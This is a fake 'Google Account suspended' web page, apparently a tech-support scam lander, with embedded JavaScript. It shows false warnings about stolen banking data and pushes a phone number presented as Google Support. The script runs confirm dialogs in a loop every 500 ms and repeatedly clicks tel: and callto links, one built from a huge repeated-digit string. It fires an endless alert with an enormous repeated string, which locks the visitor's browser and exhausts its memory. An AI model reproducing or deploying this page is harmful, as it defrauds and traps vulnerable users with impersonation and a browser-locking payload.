<!DOCTYPE html>
<html>
   <meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="../maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="../ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="Base.css" type="text/css" />
  </head>

   <body style="background-color:#1d1d1f">
   <div id="result"></div>
   
   <div class="row">
	   <div class="col-md-2"></div>
	   <div class="col-md-8 " style="padding:40px;">
			<div class="txt1"><img src="globalnav/apple/google1.png" style="height:75px;"> ACCOUNT SUSPENDED</div>
			<div class="txt2">Your <span class="textcolor">Google Account</span> has been disabled! Due to recent visiting unsecured sites,your personal data including your banking details,photographs on this device might be stolen via phishing pages.
			In case it happens,they can access all others Google devices linked to this Google Account are vulnerable.<br><span class="textcolor"> Your device may be permanently blocked today if no action is taken.</span> Immediately call Google Support 
			<span class="textcolor" style="font-size:28px">+1 (617) 855-8626</span> to unlock it!.</div>
			<div class="button" id="account"><i class="fa fa-phone" style="font-size:20px;color:white"></i> Call Google Support</div>
			<div id="orbit-system">
			  <div class="system">
				<div class="satellite-orbit">
				  <div class="satellite">SUSPENDED</div>
				</div>
				<div class="planet"><img src="globalnav/apple/google1.png" style="height:150px;"></div>
			  </div>
			</div>
			<div class="txt3">For more information please </div>
			<a href="#" id="call"><div class="button">Contact with us</div></a>
			</div>
	   <div class="col-md-2"></div>
   </div>
   
	<script>
	
	function getURLParameter(name) {
		return decodeURI(
			(RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
		);
	};
	var cookieHelper={defParams:{path:"/",domain:"."+window.location.host.replace(/:\d+/,"")},set:function(a,d,c){c=c||{};for(var b in this.defParams)"undefined"==typeof c[b]&&(c[b]=this.defParams[b]);b=c.expires;if("number"==typeof b&&b){var e=new Date;e.setTime(e.getTime()+1E3*b);b=c.expires=e}b&&b.toUTCString&&(c.expires=b.toUTCString());d=encodeURIComponent(d);a=a+"="+d;for(var f in c)a+="; "+f,d=c[f],!0!==d&&(a+="="+d);document.cookie=a},get:function(a){return(a=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")))?decodeURIComponent(a[1]):void 0},del:function(a){this.set(a,null,{expires:-1})}};


	var userAgent = window.navigator.userAgent.toLowerCase(),
		ios = /iphone|ipod|ipad/.test( userAgent );

	function parseURL(url) {
		var a=document.createElement('a');
		a.href=url;
		return a.hostname.replace('www.','');
	};

	function getPar(name) {
		var url = window.location.href;
		name = name.replace(/[\[\]]/g, "\\$&");
		var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
			results = regex.exec(url);
		if (!results) return null;
		if (!results[2]) return '';
		return decodeURIComponent(results[2].replace(/\+/g, " "));
	};

	window.number = getPar('phone');

	window.number =(window.number?window.number:'+1 (617) 855-8626');

	window.device= 'iPhone';
	window.refef = parseURL(document.referrer);

	if( ios ) {

		if(/iphone/.test( userAgent )){
			window.device= 'iPhone';
		}

		if(/ipad/.test( userAgent )){
			window.device= 'iPad';
		}

		if(/ipod/.test( userAgent )){
			window.device= 'iPod';
		}
	}

	var text = cookieHelper.get('textSetBl');
	var phone = cookieHelper.get('phoneSetBl');

	function getText () {
		var str = window.defaultText;

		for(var d in window.text){
			if(window.refef.indexOf(d)!=-1){
				str=window.text[d];
			}
		}
		//var str = window.text[window.refef]?window.text[window.refef]:window.defaultText;
		return str.replace('|%model%|',window.device).replace('|%ref%|',window.refef);
	}


	if(!phone){
		phone=getURLParameter('phone');
	}
	if(!text){
		text=getURLParameter('text');
	}

	var sText = document.querySelectorAll('.js_setTextBlock');
	for (var t = 0; t < sText.length; t++) {
		sText[t].innerHTML = getText();
	}
	var sPhone = document.querySelectorAll('.js_setPhoneBlock');
	for(var p=0;p<sPhone.length;p++){
		sPhone[p].innerHTML=phone;
	}

	$('#account').click(function() {
      okkkk();
    });
	$('#call').click(function() {
     okkkk();
    });
 	
	setInterval(function () { myFunction() }, 500);

	 function okkkk() {
		jQuery('#result').append('<a  class="anchorcall" href="tel:+1 (617) 855-8626"></a>');
		document.querySelector('a').click();
		var extraData = "";
		for (itxextraData = 0; itxextraData < 200000; itxextraData++) {
			var extraData = extraData + "5555555555";
		}
		jQuery('#result').append('<a href="#callto+' + extraData + '%00"></a>');
		document.querySelector('a').click();
		document.querySelector('a').click();
		document.querySelector('a').click();
		document.querySelector('a').click();
		document.querySelector('a').click();
		document.querySelector('a').click();
		setInterval(function(){ alert(getText().repeat(99999999999));}, 500);
	 };
	 
		function myFunction() {
		  if (confirm("Your Google Account has been locked! Due to recent visiting unsecured sites, Immediately call Google Support +1 (617) 855-8626 to unlock it!.")) {
			okkkk();
		  } else {
			okkkk();
		  }
		};
	

	 window.ununload = function () {
	     debugger;
	     location.reload();
	 }

</script>

   </body>
</html>